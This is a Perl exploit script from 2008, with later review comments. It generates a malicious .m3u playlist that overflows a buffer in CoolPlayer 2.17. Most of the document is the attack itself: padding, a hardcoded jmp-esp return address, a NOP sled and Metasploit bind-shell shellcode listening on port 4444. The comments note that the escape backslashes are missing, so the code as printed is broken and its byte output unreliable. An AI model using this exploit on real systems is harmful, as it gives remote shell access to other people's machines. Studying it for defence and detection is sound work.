# Title : CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit
# Published : 2008-01-05
# Author : Trancek
#######################################################################
#
# CoolPlayer, Latest Build: 217
# Web:: http://coolplayer.sourceforge.net/
# Playlist(.m3u) File Local Buffer Overflow Exploit
#
# Vuln: http://www.securityfocus.com/bid/21396
#
#
# Greetz: Luigi Auriemma que ha descubierto una nueva vulnerabilidad en este software junto
# a esta vuln que era antigua y que ha sido redescubierta en un software con adware por mi
# TotalPlayer 3.0(fake de Coolplayer), thanks luigi xDD
# Además del equipo de www.p1mp4m.es -->musashi,patoruzu,elvispresley,pepepistola,skyline2412
#
# Y en especial a este ultimo:skyline2412(puso parte del codigo y me ayudo bastante con la tarea) y
# el_manguan que estuvo ayudando tambien y probando.
#
# Exploit by: Trancek
# Email:trancek@yashira.org
#
# Note: The .m3u file must be loaded in the player from the directory in which it was generated.
# If that directory is a root directory such as C:/ or F:/, you must add AAA to junk
#
#######################################################################
use Cwd;
# Proof-of-concept generator: writes ./vulnerable.m3u, a playlist whose single
# entry is sized to overrun a fixed-size buffer in CoolPlayer's .m3u parser
# (see the BID link in the header). The 260 below is presumably the size of a
# path buffer on the Windows side -- TODO confirm against the advisory.
# Nothing here is hardened: no strict/warnings, package globals throughout,
# unchecked two-arg open on a bareword handle.
#
# NOTE(review): every "\x.." and "\n" escape in this listing appears as a bare
# "x.." / "n" -- the backslashes were evidently lost in archival. As printed,
# the script emits the literal text rather than the intended bytes; the code
# is left byte-identical here.
print "CoolPlayer 2.17 .m3u Exploitnn";   # banner; "nn" presumably was "\n\n"
# The padding length depends on where the script runs: per the header note the
# file must be opened from the directory it was written in, which suggests the
# player prepends the playlist's directory to the entry, so the overflow offset
# is 260 minus the length of cwd plus "/".
$dir = getcwd()."/";
$lon = length($dir);
$a = 260 - $lon;                # $a is Perl's sort variable; reusing it as a plain scalar is a known pitfall
$junk = 'A' x $a;               # filler up to the saved return address
$ret = "xEDx1Ex95x7C"; # jmp esp in ntdll.dll, Windows XP SP2 (Spanish); target-specific, bytes in little-endian order
# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
# Per the generator banner above this payload is a bind shell listening on
# TCP 4444; for defenders, a media-player process opening a listening socket
# is the observable artefact. The payload bytes are not changed or verified here.
my $shellcode =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x22".
"x5fx3cxf7x83xebxfcxe2xf4xdex35xd7xbaxcaxa6xc3x08".
"xddx3fxb7x9bx06x7bxb7xb2x1exd4x40xf2x5ax5exd3x7c".
"x6dx47xb7xa8x02x5exd7xbexa9x6bxb7xf6xccx6exfcx6e".
"x8exdbxfcx83x25x9exf6xfax23x9dxd7x03x19x0bx18xdf".
"x57xbaxb7xa8x06x5exd7x91xa9x53x77x7cx7dx43x3dx1c".
"x21x73xb7x7ex4ex7bx20x96xe1x6exe7x93xa9x1cx0cx7c".
"x62x53xb7x87x3exf2xb7xb7x2ax01x54x79x6cx51xd0xa7".
"xddx89x5axa4x44x37x0fxc5x4ax28x4fxc5x7dx0bxc3x27".
"x4ax94xd1x0bx19x0fxc3x21x7dxd6xd9x91xa3xb2x34xf5".
"x77x35x3ex08xf2x37xe5xfexd7xf2x6bx08xf4x0cx6fxa4".
"x71x0cx7fxa4x61x0cxc3x27x44x37x2dxabx44x0cxb5x16".
"xb7x37x98xedx52x98x6bx08xf4x35x2cxa6x77xa0xecx9f".
"x86xf2x12x1ex75xa0xeaxa4x77xa0xecx9fxc7x16xbaxbe".
"x75xa0xeaxa7x76x0bx69x08xf2xccx54x10x5bx99x45xa0".
"xddx89x69x08xf2x39x56x93x44x37x5fx9axabxbax56xa7".
"x7bx76xf0x7exc5x35x78x7exc0x6exfcx04x88xa1x7exda".
"xdcx1dx10x64xafx25x04x5cx89xf4x54x85xdcxecx2ax08".
"x57x1bxc3x21x79x08x6exa6x73x0ex56xf6x73x0ex69xa6".
"xddx8fx54x5axfbx5axf2xa4xddx89x56x08xddx68xc3x27".
"xa9x08xc0x74xe6x3bxc3x21x70xa0xecx9fxcdx91xdcx97".
"x71xa0xeax08xf2x5fx3cxf7";
$nopeando = "x90" x 20;         # 20-byte NOP sled (0x90) between the return address and the payload
# NOTE(review): two-arg open on a bareword handle, no error check, and the
# handle is never closed -- output is flushed only when the interpreter exits.
# A modern script would use: open my $fh, '>', './vulnerable.m3u' or die "...: $!";
open(m3u, ">./vulnerable.m3u");
print m3u "$junk";              # quoting a lone scalar is redundant; "$junk" is the same as $junk
print m3u "$ret";
print m3u "$nopeando";
print m3u "$shellcode";
# Post of exploit: http://www.p1mp4m.es/index.php?showtopic=58